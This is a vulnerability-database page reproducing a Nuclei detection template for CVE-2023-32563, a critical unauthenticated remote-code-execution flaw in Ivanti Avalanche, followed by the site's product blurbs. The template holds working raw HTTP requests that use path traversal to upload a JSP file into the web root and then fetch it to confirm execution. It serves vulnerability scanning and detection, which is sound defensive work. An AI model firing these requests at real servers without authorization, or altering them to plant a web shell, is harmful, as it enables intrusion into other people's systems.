Lucene search
K

Ivanti Avalanche - Remote Code Execution

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 57 Views

Ivanti Avalanche - Remote Code Execution, unauthenticated attacker, arbitrary code execution, security patche

Related
Refs
Code
id: CVE-2023-32563

info:
  name: Ivanti Avalanche - Remote Code Execution
  author: princechaddha
  severity: critical
  description: An unauthenticated attacker could achieve the code execution through a RemoteControl server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability.
  reference:
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
    - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32563
    - https://github.com/mayur-esh/vuln-liners
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-32563
    cwe-id: CWE-22
    epss-score: 0.90166
    epss-percentile: 0.99784
    cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ivanti
    product: avalanche
  tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /Servlet/Skins HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 333
        Content-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f
        Connection: close

        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="guid"

        ../../../Web/webapps/ROOT
        --------------------------eacf31f23ac1829f
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"

        <%
        out.println("CVE-2023-32563");
        %>
        --------------------------eacf31f23ac1829f--
      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2023-32563"
# digest: 4a0a00473045022100996ba5ce1038d378d660be4bc397389b0ce0f0a252e697c044bafa770212ebe40220411f67bb557f402ca77bfdeb82a77aeaf42a3aa8b5532ff28c75f31d5d9e1499:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
CVSS 38.8
EPSS0.90166
SSVC
57